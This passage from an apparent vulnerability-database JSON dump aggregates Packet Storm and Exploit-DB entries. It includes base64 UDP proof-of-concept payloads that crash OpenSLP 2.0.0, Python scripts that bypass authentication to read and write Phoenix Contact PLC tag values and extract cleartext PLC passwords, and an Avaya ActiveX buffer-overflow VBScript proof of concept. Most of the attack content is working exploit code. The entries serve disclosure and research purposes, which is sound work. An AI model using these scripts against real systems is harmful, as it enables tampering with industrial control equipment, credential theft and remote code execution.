sure the maintainers are going to patch it. \n \nBUG 2 \n===== \n \nFirst and foremost, I'm not claiming credit for this bug since it was \napparently discovered by Reno Robert and publicly disclosed on the \noss-security mailing list on 2016-09-27 and awarded CVE-2016-7567 \nthe day after. \n \nopenwall.com/lists/oss-security/2016/09/27/4 \nopenwall.com/lists/oss-security/2016/09/28/1 \n \nAnyhow, I wasn't aware of the issue and found it by fuzzing, so I \nreported it to the maintainers who made me aware of the earlier discovery. \nWhat puzzled me was that no announcement had been made and the fact that \nthe latest stable version on their website is still vulnerable! I found it \n2017-12-06 and reported it 2018-01-18. See further down for proof of \ndiscovery. \n \nI havn't been able to find any exploit for this bug anywhere. Therefore, \nI'm today disclosing a proof-of-concept exploit for the bug to increase \nattention on the issue. \n \nExploit: \n \necho -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d > /dev/udp/127.0.0.1/427 \n \nValgrind report: \n \n==56913== Invalid write of size 1 \n==56913== at 0x4C2D6A3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:914) \n==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210) \n==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374) \n==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514) \n==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550) \n==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220) \n==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431) \n==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94) \n==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406) \n==56913== by 0x402383: main (slpd_main.c:699) \n==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 alloc'd \n==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296) \n==56913== by 0x415C51: _xmemdup (slp_xmalloc.c:356) \n==56913== by 0x410096: SLPCompareString (slp_compare.c:365) \n==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514) \n==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550) \n==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220) \n==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431) \n==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94) \n==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406) \n==56913== by 0x402383: main (slpd_main.c:699) \n \nThe while loop on line 207 fails to perform bounds checking, and as such \nmay end up incrementing the pointer p up to a point such that p is bigger \nthan ep. Thus, the third argument to memmove on line 2010 becomes negative. \nHowever, since memmove accepts a size_t (which is unsigned) the value wraps \naround and becomes UINT_MAX or close to UINT_MAX resulting in memmove \nattempting to move an excessive amount of memory, resulting in OOB write. \n \n184 /** fold internal white space within a string. \n185 * \n186 * folds all internal white space to a single space character within a \n187 * specified string. modified the @p str parameter with the result and \n188 * returns the new length of the string. \n189 * \n190 * @param[in] len - the length in bytes of @p str. \n191 * @param[in,out] str - the string from which extraneous white space \n192 * should be removed. \n193 * \n194 * @return the new (shorter) length of @p str. \n195 * \n196 * @note this routine assumes that leading and trailing white space have \n197 * already been removed from @p str. \n198 */ \n199 static int slpfoldwhitespace(size_t len, char * str) \n200 { \n201 char * p = str, * ep = str + len; \n202 while (p < ep) \n203 { \n204 if (isspace(*p)) \n205 { \n206 char * ws2p = ++p; /* point ws2p to the second ws char. */ \n207 while (isspace(*p)) /* scan till we hit a non-ws char. */ \n208 p++; \n209 len -= p - ws2p; /* reduce the length by extra ws. */ \n210 memmove(ws2p, p, ep - p); /* overwrite the extra white space. */ \n211 } \n212 p++; \n213 } \n214 return (int)len; \n215 } \n \nProof of discovery: \n \n$ echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d | sha256sum \n5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24 - \n \ntwitter.com/magnusstubman/status/938317849474555904 \n \nPatch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a \n \nREFERENCES \n========== \n \n- sourceforge.net/p/openslp/bugs/161 \n- sourceforge.net/p/openslp/bugs/160 \n- twitter.com/magnusstubman/status/938317849474555904 \n- twitter.com/magnusstubman/status/953909628622069760 \n- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a \n- openwall.com/lists/oss-security/2016/09/27/4 \n- openwall.com/lists/oss-security/2016/09/28/1 \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150240/openslp200-oob.txt"}, {"lastseen": "2018-10-13T02:13:21", "bulletinFamily": "exploit", "description": "", "modified": "2018-10-12T00:00:00", "published": "2018-10-12T00:00:00", "id": "PACKETSTORM:149776", "href": "https://packetstormsecurity.com/files/149776/Phoenix-Contact-WebVisit-2985725-Authentication-Bypass.html", "title": "Phoenix Contact WebVisit 2985725 Authentication Bypass", "type": "packetstorm", "sourceData": "`# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass \n# Date: 2018-09-30 \n# Exploit Author: Deneut Tijl \n# Vendor Homepage: www.phoenixcontact.com \n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5 \n# Version: WebVisit (all versions) \n# CVE : CVE-2016-8380, CVE-2016-8371 \n \n# Description \n# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection) \n# Steps: \n# * Get Project Name: http://<ip>/ \n# * Get list of tags: http://<ip>/<projectname>.tcr \n# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe \n# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!) \n \n# CVE-2016-8380-SetPLCValues.py \n \n#! /usr/bin/env python \n \nimport urllib2 \n \nstrIP = raw_input('Please enter an IP [192.168.1.200]: ') \nif strIP == '': strIP = '192.168.1.200' \n \ntry: \nURLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/')) \nexcept urllib2.HTTPError: \nprint('#### Critical Error with IP ' + strIP + ': no response') \nraw_input('Press Enter to exit') \nexit() \n \nstrProject = '' \nfor line in URLResponse.readlines(): \nif 'ProjectName' in line: \nstrProject = line.split('VALUE=\"')[1].split('\"')[0] \n \nif strProject == '': \nprint('#### Error, no \\'ProjectName\\' found on the main page') \nraw_input('Press Enter to exit') \nexit() \n \nprint('---- Found project \\'' + strProject + '\\', retrieving list of tags') \n \ntry: \nTagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr')) \nexcept urllib2.HTTPError: \nprint('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found') \nraw_input('Press Enter to exit') \nexit() \n \narrTagList = [] \nfor line in TagResponse.readlines(): \nif line.startswith('#!-- N ='): \nintNumberOfTags = int(line.split('=')[1]) \nprint('---- There should be ' + str(intNumberOfTags) + ' tags:') \nif not line.startswith('#'): \nif not line.split(';')[0].strip() == '': \narrTagList.append(line.split(';')[0].strip()) \nprint('-- '+line.split(';')[0].strip()) \n \n \nraw_input('Press Enter to query them all') \nimport os, urllib \nos.system('cls' if os.name == 'nt' else 'clear') \nstrPost = '<body>' \nstrPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>' \nstrPost += '<item_list>' \nfor item in arrTagList: \nstrPost += '<i><n>' + item + '</n></i>' \nstrPost += '</item_list></body>' \nDataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read() \n \narrData = [] \nfor item in DataResponse.split('<i>'): \nif '<n>' in item: \nname = item.split('<n>')[1].split('</n>')[0] \nvalue = item.split('<v>')[1].split('</v>')[0] \narrData.append((name,value)) \nprint('----- Full list of tags and their values:') \ni = 0 \nfor item in arrData: \ni += 1 \nprint(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1]) \n \nans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ') \nif ans1 == '': \nexit() \nstrTag = arrData[int(ans1) - 1][0] \nstrVal = arrData[int(ans1) - 1][1] \nans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ') \nif ans2 == '': ans2 = strVal \nurllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2))) \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149776/phoenixcwv-bypass.txt"}, {"lastseen": "2018-10-12T02:15:26", "bulletinFamily": "exploit", "description": "", "modified": "2018-10-11T00:00:00", "published": "2018-10-11T00:00:00", "id": "PACKETSTORM:149763", "href": "https://packetstormsecurity.com/files/149763/Phoenix-Contact-WebVisit-6.40.00-Password-Disclosure.html", "title": "Phoenix Contact WebVisit 6.40.00 Password Disclosure", "type": "packetstorm", "sourceData": "`# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure \n# Exploit Author: Deneut Tijl \n# Date: 2018-09-30 \n# Vendor Homepage: www.phoenixcontact.com \n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5 \n# Version: WebVisit < 6.40.00 \n# CVE: CVE-2016-8366 \n \n# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI, \n# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are \n# surely equally vulnerable with WebVisit 6.40.00, the passwords are SHA256 hashes, which also will be retrieved \n \n# Sample output: \n# C:\\Users\\admin\\Desktop>CVE-2016-8366.py \n# Please enter an IP [192.168.1.200]: \n# This is the password for userlevel 1: pw1 \n# This is the password for userlevel 2: SuperPass2 \n# This is the password for userlevel 3: Extreme2TheMax3 \n# This is the password for userlevel 4: PowerPass4 \n# Press Enter to exit \n \n# PoC \n \n#! /usr/bin/env python \n \nimport urllib2, binascii \n \nstrIP = raw_input('Please enter an IP [192.168.1.200]: ') \nif strIP == '': strIP = '192.168.1.200' \n \ntry: \nURLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/')) \nexcept urllib2.HTTPError: \nprint('#### Critical Error with IP ' + strIP + ': no response') \nraw_input('Press Enter to exit') \nexit() \n \nstrMainTEQ = '' \nfor line in URLResponse.readlines(): \nif 'MainTEQName' in line: \nstrMainTEQ = line.split('VALUE=\"')[1].split('\"')[0] \n \nif strMainTEQ == '': \nprint('#### Error, no \\'MainTEQ\\' found on the main page') \nraw_input('Press Enter to exit') \nexit() \n \ntry: \nLoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ)) \nexcept urllib2.HTTPError: \nprint('Critical Error with IP ' + strIP + ': File \\'' + strMainTEQ + '\\' not found') \nraw_input('Press Enter to exit') \nexit() \nstrAlldata = '' \nfor line in LoginTeqResponse.readlines(): \nstrAlldata += binascii.hexlify(line) \n \n## For vulnerable webvisit: \n## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password' \n## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password' \n## For WebVisit > 6.40.00 \n## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes) \n \narrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001' \nfor item in arrData: \nif '00030003010301068300' in item: \nintUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1 \nstrPassLength = item.split('00030003010301068300')[1][:2] \nstrPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))]) \nprint('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword) \nelif '0003000301030b06830040' in item: \nintUserlevel = int(binascii.unhexlify(item[:2]), 16) \nstrHash = binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2]) \nprint('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower()) \nraw_input('Press Enter to exit') \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149763/phoenixcontactwebvisit64000-disclose.txt"}, {"lastseen": "2017-11-06T22:21:32", "bulletinFamily": "exploit", "description": "", "modified": "2017-11-05T00:00:00", "published": "2017-11-05T00:00:00", "href": "https://packetstormsecurity.com/files/144882/Avaya-IP-Office-IPO-10.1-Active-X-Buffer-Overflow.html", "id": "PACKETSTORM:144882", "title": "Avaya IP Office (IPO) 10.1 Active-X Buffer Overflow", "type": "packetstorm", "sourceData": "`[+] Credits: John Page (aka hyp3rlinx) \n[+] Website: hyp3rlinx.altervista.org \n[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt \n[+] ISR: ApparitionSec \n \n \n \nVendor: \n============= \nwww.avaya.com \n \n \n \nProduct: \n=========== \nAvaya IP Office (IPO) \nv9.1.0 - 10.1 \n \nIP Office is Avaya's global midsize solution for enterprises, supporting up to 3,000 users at a single location with IP Office Select editions. \nFor businesses with multiple locations, IP Office provides a powerful set of tools to help streamline operations, centralize management, and \nreduce total cost of ownership for converged networks. Using industry standards, IP Office enables companies to share resources, provide \nimproved customer service, and keep mobile employees accessible. \n \nProvides a hybrid PBX with TDM and IP telephony and trunk support. \nProvides IP routing, switching and firewall protection, between LAN and WAN (LAN2). \n \nIn addition to basic telephony services and voicemail, IP Office offers both hard phone and soft phone options. \nIncludes a robust set of tools for administration (Manager), call tracking (SMDR), and system monitoring and diagnostics (System Status Application). \n \nAvailable editions: Basic, Essential, Preferred, Server, Server Select, Server with Virtualized Software, Server/Sever Select hosted in the Cloud. \n \n \n \nVulnerability Type: \n==================== \nActiveX Remote Buffer Overflow \n \n \n \n \nCVE Reference: \n============== \nCVE-2017-12969 \nASA-2017-313 \n \n \n \nSecurity Issue: \n================ \nViewerCtrl.ocx ActiveX Component used by Avaya IP Office (IPO) can be exploited by remote attackers to potentially execute arbitrary \nattacker supplied code. User would have to visit a malicious webpage using InternetExplorer where the exploit could be triggered. \n \nClsid: {27F12EFD-325D-4907-A2D2-C38A2B6D3334} \nSafe for Script: False \nSafe for Init: False \n \nACCESS_VIOLATION \n8C4A77 MOV EAX,[ECX] \n \nSEH Chain: \n----------- \n1 8D00A3 po.dll \n2 36A7E95 CIPElements.dll \n3 36A8115 CIPElements.dll \n4 788719 ViewerCtrl.OCX \n5 788533 ViewerCtrl.OCX \n6 78862A ViewerCtrl.OCX \n7 6008793E mfc90u.dll \n8 60089B31 mfc90u.dll \n9 779858C5 ntdll.dll \n \n \n(d360.1040c): Access violation - code c0000005 (first/second chance not available) \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for po.dll - \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for CIPElements.dll - \neax=0608ec18 ebx=00000000 ecx=00000000 edx=00000000 esi=0aa7bdd0 edi=0aa7bdd0 \neip=06064a77 esp=03535c78 ebp=03535db0 iopl=0 nv up ei pl zr na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246 \npo!cip::po::SpecialObjects::getPresetObject+0x77: \n06064a77 8b01 mov eax,dword ptr [ecx] ds:002b:00000000=???????? \n0:008> !load winext/msec \n0:008> !exploitable \n \n!exploitable 1.6.0.0 \n*** ERROR: Module load completed but symbols could not be loaded for mfc90u.dll \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for mshtml.dll - \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for user32.dll - \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for ieframe.dll - \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for iertutil.dll - \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for IEShims.dll - \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll - \n \nExploitability Classification: PROBABLY_EXPLOITABLE \n \nRecommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at \npo!cip::po::SpecialObjects::getPresetObject+0x0000000000000077 (Hash=0x6f1f914b.0xc46b7285) \n \nThe data from the faulting address is later used as the target for a branch. \n \n \nReferences: \n============== \nhttps://downloads.avaya.com/css/P8/documents/101044091 \n \n \nExploit/POC: \n============= \n \n<object classid='clsid:27F12EFD-325D-4907-A2D2-C38A2B6D3334' id='victim' /> \n \n<script language='vbscript'> \nvictimFile = \"C:\\Program Files (x86)\\Avaya\\IP Office Contact Center\\User Interface\\ViewerCtrl.ocx\" \nprototype = \"Function open ( ByVal containerId As String ) As Long\" \nmemberName = \"open\" \nprogid = \"ViewerCtrlLib.ViewerCtrl\" \nargCount = 1 \npayload=String(5142, \"A\") \n \nvictim.open payload \n \n</script> \n \n \nNetwork Access: \n=============== \nRemote \n \n \n \n \nSeverity: \n========= \nHigh \n \n \n \nDisclosure Timeline: \n============================= \nVendor Notification: July 12, 2017 \nVendor acknowlegement: July 14, 2017 \nCVE assigned by mitre : August 19, 2017 \nVendor advisory : November 4, 2017 \nNovember 5, 2017 : Public Disclosure \n \n \n \n[+] Disclaimer \nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. \nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and \nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit \nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility \nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information \nor exploits by the author or elsewhere. All content (c). \n \nhyp3rlinx \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144882/AVAYA-OFFICE-IP-IPO-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt"}], "exploitdb": [{"lastseen": "2018-11-30T12:31:27", "bulletinFamily": "exploit", "description": "", "modified": "2018-11-07T00:00:00", "published": "2018-11-07T00:00:00", "id": "EDB-ID:45804", "href": "https://www.exploit-db.com/exploits/45804", "type": "exploitdb", "title": "OpenSLP 2.0.0 - Multiple Vulnerabilities", "sourceData": "\r\n _ _ \r\n / | ___ ___ ___ ___ ___| |___ \r\n _ / / | . | . | -_| |_ -| | . |\r\n|_|_/ |___| _|___|_|_|___|_| _|\r\n |_| |_| \r\n\r\n2018-11-07\r\n\r\nMORE BUGS IN OPENSLP-2.0.0\r\n==========================\r\n\r\nI discovered some bugs in openslp-2.0.0 back in January, 2018. \r\nOne of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free),\r\nand today I'm disclosing two more.\r\n\r\n\r\nBUG 1\r\n=====\r\n\r\nThis issue is an OOB read that does not crash the application.\r\nSo in terms of exploitation it is not very interesting. If that's what\r\nyou're here for then scroll down to bug#2.\r\nAfter the occurence of the bug the application actually detects the error\r\nand ignores the malicious packet. Therefore, it could be argued that this\r\nis not a bug at all. Nevertheless, here it is:\r\n\r\nProof of concept exploit:\r\n\r\n echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d > /dev/udp/127.0.0.1/427\r\n\r\nValgrind report:\r\n\r\n ==27968== Invalid read of size 1\r\n ==27968== at 0x412436: GetUINT16 (slp_message.c:63)\r\n ==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327)\r\n ==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005)\r\n ==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393)\r\n ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)\r\n ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)\r\n ==27968== by 0x40256B: main (slpd_main.c:699)\r\n ==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd\r\n ==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n ==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67)\r\n ==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139)\r\n ==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383)\r\n ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)\r\n ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)\r\n ==27968== by 0x40256B: main (slpd_main.c:699)\r\n\r\nAnalysis:\r\n\r\nv2ParseSrvReg is responsible for parsing incoming requests. Various bytes\r\nare read from the packet and interpreted as integers used as length fields.\r\nOne of them is the scopelistlen, parsed on line 321, and further used as\r\nargument for the amount of bytes to increment the buffer->curpos pointer\r\nin the the GetStrPtr function, shown below on line 112. It now points to\r\nuninitialized memory.\r\n\r\nThe OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos \r\npointer is dereferenced.\r\n\r\nSubsequently the comparison on line 329 evaluates to true since the\r\nbuffer->curpos now points to memory located after the buffer->end\r\npointer. The application therefore stops processing the malicious packet.\r\n\r\n 291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg)\r\n 292 {\r\n 293 int result;\r\n 294\r\n 295 /* 0 1 2 3\r\n 296 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\r\n 297 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 298 | <URL-Entry> \\\r\n 299 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 300 | length of service type string | <service-type> \\\r\n 301 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 302 | length of <scope-list> | <scope-list> \\\r\n 303 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 304 | length of attr-list string | <attr-list> \\\r\n 305 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 306 |# of AttrAuths |(if present) Attribute Authentication Blocks...\\\r\n 307 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */\r\n 308\r\n 309 /* Parse the <URL-Entry>. */\r\n 310 result = v2ParseUrlEntry(buffer, &srvreg->urlentry);\r\n 311 if (result != 0)\r\n 312 return result;\r\n 313\r\n 314 /* Parse the <service-type> string. */\r\n 315 srvreg->srvtypelen = GetUINT16(&buffer->curpos);\r\n 316 srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen);\r\n 317 if (buffer->curpos > buffer->end)\r\n 318 return SLP_ERROR_PARSE_ERROR;\r\n 319\r\n 320 /* Parse the <scope-list> string. */\r\n 321 srvreg->scopelistlen = GetUINT16(&buffer->curpos);\r\n 322 srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen);\r\n 323 if (buffer->curpos > buffer->end)\r\n 324 return SLP_ERROR_PARSE_ERROR;\r\n 325\r\n 326 /* Parse the <attr-list> string. */\r\n 327 srvreg->attrlistlen = GetUINT16(&buffer->curpos);\r\n 328 srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen);\r\n 329 if (buffer->curpos > buffer->end)\r\n 330 return SLP_ERROR_PARSE_ERROR;\r\n \r\n 54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word.\r\n 55 *\r\n 56 * @param[in,out] cpp - The address of a pointer from which to extract.\r\n 57 *\r\n 58 * @return A 16-bit unsigned value in native format; the buffer pointer\r\n 59 * is moved ahead by 2 bytes on return.\r\n 60 */\r\n 61 uint16_t GetUINT16(uint8_t ** cpp)\r\n 62 {\r\n 63 uint16_t rv = AS_UINT16(*cpp);\r\n 64 *cpp += 2;\r\n 65 return rv;\r\n 66 }\r\n ...\r\n 96 /** Extract a string buffer address into a character pointer.\r\n 97 *\r\n 98 * Note that this routine doesn't actually copy the string. It only casts\r\n 99 * the buffer pointer to a character pointer and moves the value at @p cpp\r\n 100 * ahead by @p len bytes.\r\n 101 *\r\n 102 * @param[in,out] cpp - The address of a pointer from which to extract.\r\n 103 * @param[in] len - The length of the string to extract.\r\n 104 *\r\n 105 * @return A pointer to the first character at the address pointed to by\r\n 106 * @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes\r\n 107 * on return.\r\n 108 */\r\n 109 char * GetStrPtr(uint8_t ** cpp, size_t len)\r\n 110 {\r\n 111 char * sp = (char *)*cpp;\r\n 112 *cpp += len;\r\n 113 return sp;\r\n 114 }\r\n\r\n\r\nProof of discovery: \r\n\r\n $ echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d | sha256sum\r\n 0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946 -\r\n\r\ntwitter.com/magnusstubman/status/953909628622069760\r\n\r\n\r\nPatch:\r\n\r\nI'm not aware of any patch, and I'm not sure the maintainers are going to patch it.\r\n\r\nBUG 2\r\n=====\r\n\r\nFirst and foremost, I'm not claiming credit for this bug since it was\r\napparently discovered by Reno Robert and publicly disclosed on the\r\noss-security mailing list on 2016-09-27 and awarded CVE-2016-7567\r\nthe day after.\r\n\r\nopenwall.com/lists/oss-security/2016/09/27/4\r\nopenwall.com/lists/oss-security/2016/09/28/1\r\n\r\nAnyhow, I wasn't aware of the issue and found it by fuzzing, so I\r\nreported it to the maintainers who made me aware of the earlier discovery.\r\nWhat puzzled me was that no announcement had been made and the fact that\r\nthe latest stable version on their website is still vulnerable! I found it\r\n2017-12-06 and reported it 2018-01-18. See further down for proof of\r\ndiscovery.\r\n\r\nI havn't been able to find any exploit for this bug anywhere. Therefore,\r\nI'm today disclosing a proof-of-concept exploit for the bug to increase\r\nattention on the issue.\r\n\r\nExploit:\r\n\r\n echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d > /dev/udp/127.0.0.1/427\r\n\r\nValgrind report:\r\n\r\n ==56913== Invalid write of size 1\r\n ==56913== at 0x4C2D6A3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:914)\r\n ==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210)\r\n ==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374)\r\n ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)\r\n ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)\r\n ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)\r\n ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)\r\n ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)\r\n ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)\r\n ==56913== by 0x402383: main (slpd_main.c:699)\r\n ==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 alloc'd\r\n ==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n ==56913== by 0x415C51: _xmemdup (slp_xmalloc.c:356)\r\n ==56913== by 0x410096: SLPCompareString (slp_compare.c:365)\r\n ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)\r\n ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)\r\n ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)\r\n ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)\r\n ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)\r\n ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)\r\n ==56913== by 0x402383: main 